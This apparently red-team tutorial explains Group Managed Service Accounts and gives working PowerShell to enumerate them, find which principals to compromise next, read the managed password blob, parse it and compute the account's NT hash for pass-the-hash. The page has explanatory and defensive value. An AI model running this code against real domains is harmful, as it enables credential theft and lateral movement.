Group Managed Service Accounts (gMSA)
A Group Managed Service Account (gMSA) is a type of Active Directory account designed to run services on one or more servers. gMSAs improve on traditional service accounts because their passwords are generated and rotated automatically by the domain controllers: the same account can run a service on many hosts without anyone having to update the password on each of them.
gMSAs are recommended as a mitigation against Kerberoasting. Their SPNs can still be enumerated and service tickets still requested, but the password is 256 random bytes and is rotated every 30 days by default, so cracking a captured ticket offline is not practical. The password is not stored as a plain attribute: when an authorized principal reads 'msDS-ManagedPassword', the domain controller computes the current password from the KDS root key and returns it in a binary blob. Only the principals explicitly listed in 'msDS-GroupMSAMembership' can read the blob; even Domain Admins cannot read it by default. Anyone who can write that attribute (or the gMSA object's DACL) can, however, grant themselves the right, so write access to a gMSA object is as sensitive as read access to the password.
Enumeration
A gMSA has object class msDS-GroupManagedServiceAccount. This can be used to find the accounts.
```powershell
# PowerView (note the hyphen in the class name)
Get-DomainObject -LDAPFilter '(objectClass=msDS-GroupManagedServiceAccount)'
```
```powershell
# ActiveDirectory module
Get-ADServiceAccount -Filter *
```
The attribute 'msDS-GroupMSAMembership' (PrincipalsAllowedToRetrieveManagedPassword) lists the principals that can read the password blob.
```powershell
Get-ADServiceAccount -Identity <gMSA> -Properties * | select PrincipalsAllowedToRetrieveManagedPassword
```
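The following is an added example, not code from the original page: it uses the ActiveDirectory (RSAT) module to list every gMSA in the domain, resolve the principals allowed to read its password to SIDs, and flag the accounts the current user (through direct or nested group membership) or the local computer account can already read. It assumes a domain-joined session; the function name Get-GmsaReadAccess is a hypothetical helper written for this example.

```powershell
# Added example (not from the original page): enumerate every gMSA with the
# ActiveDirectory (RSAT) module, resolve who may read its password, and flag
# those the current user or the local computer account can already read.
Import-Module ActiveDirectory

function Get-GmsaReadAccess {
    [CmdletBinding()]
    param()

    # The logon token already carries every nested group SID, so a SID comparison
    # covers transitive group membership without expanding groups recursively.
    $me = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($me.User.Value) + @($me.Groups | ForEach-Object Value)
    # gMSAs are usually granted to the hosts that run the service, so add the
    # local computer account's SID (direct grants only; its groups are not expanded).
    try { $mySids += (Get-ADComputer -Identity $env:COMPUTERNAME).SID.Value } catch { }

    $props = 'PrincipalsAllowedToRetrieveManagedPassword', 'ServicePrincipalNames',
             'msDS-ManagedPasswordInterval', 'PasswordLastSet'
    foreach ($gmsa in Get-ADServiceAccount -Filter * -Properties $props) {
        # PrincipalsAllowedToRetrieveManagedPassword is the cmdlet's rendering of the
        # msDS-GroupMSAMembership ACL as distinguished names; resolve each DN to a SID.
        $readers = foreach ($dn in $gmsa.PrincipalsAllowedToRetrieveManagedPassword) {
            $obj = Get-ADObject -Identity $dn -Properties objectSid
            [pscustomobject]@{
                Name = $obj.Name; Class = $obj.ObjectClass; Sid = $obj.objectSid.Value
                Mine = ($mySids -contains $obj.objectSid.Value)
            }
        }
        [pscustomobject]@{
            Account         = $gmsa.SamAccountName
            Enabled         = $gmsa.Enabled
            SPNs            = ($gmsa.ServicePrincipalNames -join ', ')
            RotationDays    = $gmsa.'msDS-ManagedPasswordInterval'
            PasswordLastSet = $gmsa.PasswordLastSet
            AllowedReaders  = (($readers | ForEach-Object { "$($_.Name) [$($_.Class)]" }) -join ', ')
            ReadableByMe    = [bool]($readers | Where-Object Mine)
        }
    }
}

Get-GmsaReadAccess | Sort-Object ReadableByMe -Descending | Format-Table -AutoSize
```

Accounts with ReadableByMe set are the ones whose password blob the current context can already pull; for the rest, AllowedReaders tells you which user, group, or computer to compromise next. The computer-account check only covers a direct grant to this host, not groups the computer account belongs to.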
The attribute msDS-ManagedPassword stores the password blob in binary form. Once you have compromised a principal that can read the blob, use the ActiveDirectory module to read it and DSInternals to compute the NTLM hash:
```powershell
# Retrieve the password blob. Run this as (or in a session authenticated as) a principal
# that is allowed to read it; an empty result means the current principal is not allowed.
$Passwordblob = (Get-ADServiceAccount -Identity <gMSA> -Properties msDS-ManagedPassword).'msDS-ManagedPassword'
# Compute the NTLM hash with DSInternals
Import-Module C:\Tools\DSInternals.psd1
$decodedpwd = ConvertFrom-ADManagedPasswordBlob $Passwordblob
ConvertTo-NTHash -Password $decodedpwd.SecureCurrentPassword
```
Once you have the NTLM hash, it can be used to authenticate to other services as the gMSA, for example with Pass the Hash, or with Overpass the Hash to obtain a Kerberos TGT for the account. Remember that the password rotates (every 30 days by default), so the hash has to be re-read from the blob after each rotation.
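As an added example that is not part of the original page, the script below parses the raw msDS-ManagedPassword value itself (the MSDS-MANAGEDPASSWORD_BLOB structure documented in MS-ADTS: a 16-byte header of offsets, a null-terminated UTF-16LE current password, an optional previous password, and two 100 ns interval fields) and derives the NT hash as MD4 over the raw password bytes, with no DSInternals dependency. The function names Get-MD4Hex, Get-NTHashHex, ConvertFrom-ManagedPasswordBlobRaw and New-SampleManagedPasswordBlob are hypothetical helpers written for this example, and the blob it parses is constructed inline so the script runs offline; the MD4 core is self-tested against the well-known NT hash of "password".

```powershell
# Added example (not from the original page): parse a raw msDS-ManagedPassword value
# (MSDS-MANAGEDPASSWORD_BLOB, MS-ADTS) in plain PowerShell and derive the NT hash as
# MD4 over the raw UTF-16LE password bytes, without DSInternals. The blob below is
# constructed so the script runs offline; see the usage note for live data.

function Get-MD4Hex {
    param([Parameter(Mandatory)][AllowEmptyCollection()][byte[]]$Bytes)
    $mask = [uint64]4294967295                       # 2^32-1: keep every value in 32 bits
    function rotl([uint64]$x, [int]$s) { (($x -shl $s) -bor ($x -shr (32 - $s))) -band $mask }
    # Padding: 0x80, zeros up to 56 mod 64, then the message bit length, little-endian
    $n = $Bytes.Length; $pad = ((56 - (($n + 1) % 64)) + 64) % 64
    $m = [byte[]]::new($n + 1 + $pad + 8)
    if ($n -gt 0) { [Array]::Copy($Bytes, $m, $n) }
    $m[$n] = 0x80; $bits = [uint64]$n * 8
    for ($i = 0; $i -lt 8; $i++) { $m[$n + 1 + $pad + $i] = [byte](($bits -shr (8 * $i)) -band 255) }
    $h  = [uint64[]](1732584193, 4023233417, 2562383102, 271733878)   # 67452301 efcdab89 98badcfe 10325476
    $k2 = 0,4,8,12,1,5,9,13,2,6,10,14,3,7,11,15; $k3 = 0,8,4,12,2,10,6,14,1,9,5,13,3,11,7,15
    $s1 = 3,7,11,19; $s2 = 3,5,9,13; $s3 = 3,9,11,15
    for ($off = 0; $off -lt $m.Length; $off += 64) {
        $X = for ($j = 0; $j -lt 16; $j++) { [uint64][BitConverter]::ToUInt32($m, $off + 4 * $j) }
        $a = $h[0]; $b = $h[1]; $c = $h[2]; $d = $h[3]
        for ($j = 0; $j -lt 48; $j++) {
            switch ([int][math]::Floor($j / 16)) {
                0 { $f = ($b -band $c) -bor (($mask -bxor $b) -band $d);       $k = $j;         $s = $s1[$j % 4]; $t = [uint64]0 }
                1 { $f = ($b -band $c) -bor ($b -band $d) -bor ($c -band $d); $k = $k2[$j - 16]; $s = $s2[$j % 4]; $t = [uint64]1518500249 }
                2 { $f = $b -bxor $c -bxor $d;                                $k = $k3[$j - 32]; $s = $s3[$j % 4]; $t = [uint64]1859775393 }
            }
            $r = rotl (($a + $f + $X[$k] + $t) -band $mask) $s
            $a = $d; $d = $c; $c = $b; $b = $r               # registers rotate: the next step updates "d"
        }
        $h[0] = ($h[0] + $a) -band $mask; $h[1] = ($h[1] + $b) -band $mask
        $h[2] = ($h[2] + $c) -band $mask; $h[3] = ($h[3] + $d) -band $mask
    }
    -join ($h | ForEach-Object { $w = $_; 0..3 | ForEach-Object { '{0:x2}' -f (($w -shr (8 * $_)) -band 255) } })
}

function Get-NTHashHex {   # NT hash = MD4 over the UTF-16LE password bytes; a gMSA blob already holds those bytes
    param([Parameter(Mandatory)][byte[]]$PasswordBytes)
    Get-MD4Hex -Bytes $PasswordBytes
}

function ConvertFrom-ManagedPasswordBlobRaw {
    param([Parameter(Mandatory)][byte[]]$Blob)
    # Header: Version(2) Reserved(2) Length(4) CurrentPasswordOffset(2) PreviousPasswordOffset(2)
    #         QueryPasswordIntervalOffset(2) UnchangedPasswordIntervalOffset(2); offsets count from byte 0
    if ([BitConverter]::ToUInt16($Blob, 0) -ne 1)            { throw 'Unsupported blob version' }
    if ([BitConverter]::ToUInt32($Blob, 4) -ne $Blob.Length) { throw 'Length field does not match blob size' }
    $cur = [BitConverter]::ToUInt16($Blob, 8);  $prev = [BitConverter]::ToUInt16($Blob, 10)
    $qi  = [BitConverter]::ToUInt16($Blob, 12); $ui   = [BitConverter]::ToUInt16($Blob, 14)
    function Read-WStr([int]$o) {                 # null-terminated UTF-16LE: bytes up to the first 0x0000 unit
        $e = $o
        while ($e + 1 -lt $Blob.Length -and ($Blob[$e] -ne 0 -or $Blob[$e + 1] -ne 0)) { $e += 2 }
        if ($e -eq $o) { return ,[byte[]]@() }
        return ,[byte[]]$Blob[$o..($e - 1)]
    }
    $prevPw = if ($prev -ne 0) { Read-WStr $prev } else { $null }   # offset 0 means no previous password
    [pscustomobject]@{
        CurrentPassword           = Read-WStr $cur
        PreviousPassword          = $prevPw
        QueryPasswordInterval     = [TimeSpan]::FromTicks([BitConverter]::ToInt64($Blob, $qi))   # 100 ns units
        UnchangedPasswordInterval = [TimeSpan]::FromTicks([BitConverter]::ToInt64($Blob, $ui))
    }
}

function New-SampleManagedPasswordBlob {
    # Constructed test blob (not real AD data) with the same layout as a live one; no previous password
    param([Parameter(Mandatory)][byte[]]$CurrentPassword, [TimeSpan]$Query, [TimeSpan]$Unchanged)
    $curOff = 16; $qiOff = ($curOff + $CurrentPassword.Length + 2 + 7) -band (-8)   # terminator, then 8-byte align
    $uiOff = $qiOff + 8; $b = [byte[]]::new($uiOff + 8)
    [BitConverter]::GetBytes([uint16]1).CopyTo($b, 0);       [BitConverter]::GetBytes([uint32]$b.Length).CopyTo($b, 4)
    [BitConverter]::GetBytes([uint16]$curOff).CopyTo($b, 8)  # bytes 10-11 stay 0: no PreviousPassword
    [BitConverter]::GetBytes([uint16]$qiOff).CopyTo($b, 12); [BitConverter]::GetBytes([uint16]$uiOff).CopyTo($b, 14)
    $CurrentPassword.CopyTo($b, $curOff)
    [BitConverter]::GetBytes([int64]$Query.Ticks).CopyTo($b, $qiOff); [BitConverter]::GetBytes([int64]$Unchanged.Ticks).CopyTo($b, $uiOff)
    ,$b
}

# 1. Self-test the MD4 core against the well-known NT hash of "password"
$ref = Get-NTHashHex -PasswordBytes ([Text.Encoding]::Unicode.GetBytes('password'))
if ($ref -ne '8846f7eaee8fb117ad06bdd830b7586c') { throw "MD4 self-test failed: $ref" }

# 2. Constructed 256-byte password (128 random UTF-16 code units, none 0x0000) inside a constructed blob
$pw = [byte[]](1..128 | ForEach-Object { [BitConverter]::GetBytes([uint16](Get-Random -Minimum 1 -Maximum 65536)) })
$blob = New-SampleManagedPasswordBlob -CurrentPassword $pw -Query ([TimeSpan]::FromDays(30)) -Unchanged ([TimeSpan]::FromDays(29))
$parsed = ConvertFrom-ManagedPasswordBlobRaw -Blob $blob
"Current password: $($parsed.CurrentPassword.Length) bytes, next query in $($parsed.QueryPasswordInterval.Days) days"
"NT hash: $(Get-NTHashHex -PasswordBytes $parsed.CurrentPassword)"
```

Against a live account, replace the constructed blob with the bytes returned by `(Get-ADServiceAccount -Identity <gMSA> -Properties msDS-ManagedPassword).'msDS-ManagedPassword'`. The two interval fields are what make the blob worth parsing rather than just hashing: UnchangedPasswordInterval tells you how long the hash you just computed stays valid, and PreviousPassword, when present, still works for the short overlap window after a rotation.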